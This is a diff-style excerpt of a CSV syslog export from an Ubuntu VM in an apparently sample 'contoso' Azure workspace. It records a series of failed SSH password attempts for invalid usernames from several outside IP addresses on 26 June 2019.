+6801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:39,UbuntuDevEnv,2019-06-26 17:07:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:41,UbuntuDevEnv,2019-06-26 17:07:41,auth,UbuntuDevEnv,info,Failed password for invalid user db2fenc1 from 35.154.19.93 port 52086 ssh2,45233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2fenc1,35.154.19.9,52086,,
+6803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:42,UbuntuDevEnv,2019-06-26 17:07:41,auth,UbuntuDevEnv,info,Disconnected from invalid user db2fenc1 35.154.19.93 port 52086 [preauth],45233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2fenc1,35.154.19.9,52086,,
+6804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:42,UbuntuDevEnv,2019-06-26 17:07:41,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 52086:11: Normal Shutdown, Thank you for playing [preauth]",45233,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,52086,,
+6805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:51,UbuntuDevEnv,2019-06-26 17:07:51,auth,UbuntuDevEnv,info,Invalid user bande from 171.8.199.77 port 35250,45273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bande,171.8.199.7,35250,,
+6806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:51,UbuntuDevEnv,2019-06-26 17:07:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,45273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:51,UbuntuDevEnv,2019-06-26 17:07:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:53,UbuntuDevEnv,2019-06-26 17:07:53,auth,UbuntuDevEnv,info,Failed password for invalid user bande from 171.8.199.77 port 35250 ssh2,45273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bande,171.8.199.7,35250,,
+6809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:55,UbuntuDevEnv,2019-06-26 17:07:55,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 35250:11: Bye Bye [preauth],45273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,35250,,
+6810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:07:55,UbuntuDevEnv,2019-06-26 17:07:55,auth,UbuntuDevEnv,info,Disconnected from invalid user bande 171.8.199.77 port 35250 [preauth],45273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bande,171.8.199.7,35250,,
+6811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:14,UbuntuDevEnv,2019-06-26 17:08:14,auth,UbuntuDevEnv,info,Invalid user db2inst1 from 35.154.19.93 port 55390,45363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,35.154.19.9,55390,,
+6812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:14,UbuntuDevEnv,2019-06-26 17:08:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:14,UbuntuDevEnv,2019-06-26 17:08:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:16,UbuntuDevEnv,2019-06-26 17:08:16,auth,UbuntuDevEnv,info,Invalid user admin from 74.94.246.82 port 47796,45370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,74.94.246.8,47796,,
+6815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:16,UbuntuDevEnv,2019-06-26 17:08:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:16,UbuntuDevEnv,2019-06-26 17:08:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,45370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:17,UbuntuDevEnv,2019-06-26 17:08:17,auth,UbuntuDevEnv,info,Failed password for invalid user db2inst1 from 35.154.19.93 port 55390 ssh2,45363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,35.154.19.9,55390,,
+6818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:17,UbuntuDevEnv,2019-06-26 17:08:17,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 55390:11: Normal Shutdown, Thank you for playing [preauth]",45363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,55390,,
+6819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:17,UbuntuDevEnv,2019-06-26 17:08:17,auth,UbuntuDevEnv,info,Disconnected from invalid user db2inst1 35.154.19.93 port 55390 [preauth],45363,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2inst1,35.154.19.9,55390,,
+6820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:19,UbuntuDevEnv,2019-06-26 17:08:18,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 74.94.246.82 port 47796 ssh2,45370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,74.94.246.8,47796,,
+6821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:19,UbuntuDevEnv,2019-06-26 17:08:18,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 47796:11: Bye Bye [preauth],45370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,47796,,
+6822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:19,UbuntuDevEnv,2019-06-26 17:08:18,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 74.94.246.82 port 47796 [preauth],45370,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,74.94.246.8,47796,,
+6823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:27,UbuntuDevEnv,2019-06-26 17:08:26,auth,UbuntuDevEnv,info,Invalid user cyril from 77.237.69.165 port 39058,45414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,77.237.69.1,39058,,
+6824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:27,UbuntuDevEnv,2019-06-26 17:08:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:27,UbuntuDevEnv,2019-06-26 17:08:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,45414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+6826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:30,UbuntuDevEnv,2019-06-26 17:08:29,auth,UbuntuDevEnv,info,Failed password for invalid user cyril from 77.237.69.165 port 39058 ssh2,45414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,77.237.69.1,39058,,
+6827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:30,UbuntuDevEnv,2019-06-26 17:08:29,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 39058:11: Bye Bye [preauth],45414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,39058,,
+6828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:30,UbuntuDevEnv,2019-06-26 17:08:29,auth,UbuntuDevEnv,info,Disconnected from invalid user cyril 77.237.69.165 port 39058 [preauth],45414,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cyril,77.237.69.1,39058,,
+6829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:40,UbuntuDevEnv,2019-06-26 17:08:40,auth,UbuntuDevEnv,info,Invalid user deploy from 81.0.212.18 port 57656,45467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,81.0.212.1,57656,,
+6830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:40,UbuntuDevEnv,2019-06-26 17:08:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,45467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:40,UbuntuDevEnv,2019-06-26 17:08:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:42,UbuntuDevEnv,2019-06-26 17:08:42,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 81.0.212.18 port 57656 ssh2,45467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,81.0.212.1,57656,,
+6833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:43,UbuntuDevEnv,2019-06-26 17:08:42,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 57656:11: Bye Bye [preauth],45467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,57656,,
+6834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:43,UbuntuDevEnv,2019-06-26 17:08:42,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 81.0.212.18 port 57656 [preauth],45467,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,81.0.212.1,57656,,
+6835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:50,UbuntuDevEnv,2019-06-26 17:08:49,auth,UbuntuDevEnv,info,Invalid user db2fenc1 from 35.154.19.93 port 58714,45497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2fenc1,35.154.19.9,58714,,
+6836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:50,UbuntuDevEnv,2019-06-26 17:08:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:50,UbuntuDevEnv,2019-06-26 17:08:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:52,UbuntuDevEnv,2019-06-26 17:08:52,auth,UbuntuDevEnv,info,Failed password for invalid user db2fenc1 from 35.154.19.93 port 58714 ssh2,45497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2fenc1,35.154.19.9,58714,,
+6839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:53,UbuntuDevEnv,2019-06-26 17:08:52,auth,UbuntuDevEnv,info,Disconnected from invalid user db2fenc1 35.154.19.93 port 58714 [preauth],45497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2fenc1,35.154.19.9,58714,,
+6840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:08:53,UbuntuDevEnv,2019-06-26 17:08:52,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 58714:11: Normal Shutdown, Thank you for playing [preauth]",45497,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,58714,,
+6841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:24,UbuntuDevEnv,2019-06-26 17:09:23,auth,UbuntuDevEnv,info,Invalid user dn2inst1 from 35.154.19.93 port 33772,45611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dn2inst1,35.154.19.9,33772,,
+6842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:24,UbuntuDevEnv,2019-06-26 17:09:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,45611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:24,UbuntuDevEnv,2019-06-26 17:09:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:25,UbuntuDevEnv,2019-06-26 17:09:24,auth,UbuntuDevEnv,info,Failed password for invalid user dn2inst1 from 35.154.19.93 port 33772 ssh2,45611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dn2inst1,35.154.19.9,33772,,
+6845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:25,UbuntuDevEnv,2019-06-26 17:09:25,auth,UbuntuDevEnv,info,Disconnected from invalid user dn2inst1 35.154.19.93 port 33772 [preauth],45611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dn2inst1,35.154.19.9,33772,,
+6846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:25,UbuntuDevEnv,2019-06-26 17:09:25,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 33772:11: Normal Shutdown, Thank you for playing [preauth]",45611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,33772,,
+6847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:48,UbuntuDevEnv,2019-06-26 17:09:47,auth,UbuntuDevEnv,info,Invalid user ianb from 74.94.246.82 port 36754,45703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ianb,74.94.246.8,36754,,
+6848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:48,UbuntuDevEnv,2019-06-26 17:09:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,45703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+6849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:48,UbuntuDevEnv,2019-06-26 17:09:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:50,UbuntuDevEnv,2019-06-26 17:09:50,auth,UbuntuDevEnv,info,Failed password for invalid user ianb from 74.94.246.82 port 36754 ssh2,45703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ianb,74.94.246.8,36754,,
+6851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:50,UbuntuDevEnv,2019-06-26 17:09:50,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 36754:11: Bye Bye [preauth],45703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,36754,,
+6852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:50,UbuntuDevEnv,2019-06-26 17:09:50,auth,UbuntuDevEnv,info,Disconnected from invalid user ianb 74.94.246.82 port 36754 [preauth],45703,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ianb,74.94.246.8,36754,,
+6853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:54,UbuntuDevEnv,2019-06-26 17:09:53,auth,UbuntuDevEnv,info,Invalid user qian from 77.237.69.165 port 46247,45729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,77.237.69.1,46247,,
+6854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:54,UbuntuDevEnv,2019-06-26 17:09:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,45729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+6855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:54,UbuntuDevEnv,2019-06-26 17:09:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:56,UbuntuDevEnv,2019-06-26 17:09:55,auth,UbuntuDevEnv,info,Failed password for invalid user qian from 77.237.69.165 port 46247 ssh2,45729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,77.237.69.1,46247,,
+6857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:56,UbuntuDevEnv,2019-06-26 17:09:56,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 46247:11: Bye Bye [preauth],45729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,46247,,
+6858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:56,UbuntuDevEnv,2019-06-26 17:09:56,auth,UbuntuDevEnv,info,Disconnected from invalid user qian 77.237.69.165 port 46247 [preauth],45729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qian,77.237.69.1,46247,,
+6859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:09:57,UbuntuDevEnv,2019-06-26 17:09:56,auth,UbuntuDevEnv,info,Invalid user wang from 35.154.19.93 port 37080,45742,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wang,35.154.19.9,37080,,
